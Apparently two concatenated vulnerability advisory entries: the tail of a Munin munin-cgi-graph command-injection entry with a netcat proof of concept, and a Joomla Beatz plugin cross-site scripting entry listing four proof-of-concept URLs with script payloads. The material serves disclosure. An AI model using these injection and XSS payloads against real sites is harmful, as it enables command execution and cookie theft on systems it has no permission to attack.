Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application.
printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80
source: https://www.securityfocus.com/bid/53030/info
Joomla! Beatz Plugin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
http://www.example.com/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
http://www.example.com/beatz/index.php?do=listAll&keyword=++Search";><img+src=0+onerror=prompt(/XSS/)>&option=com_find
http://www.example.com/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search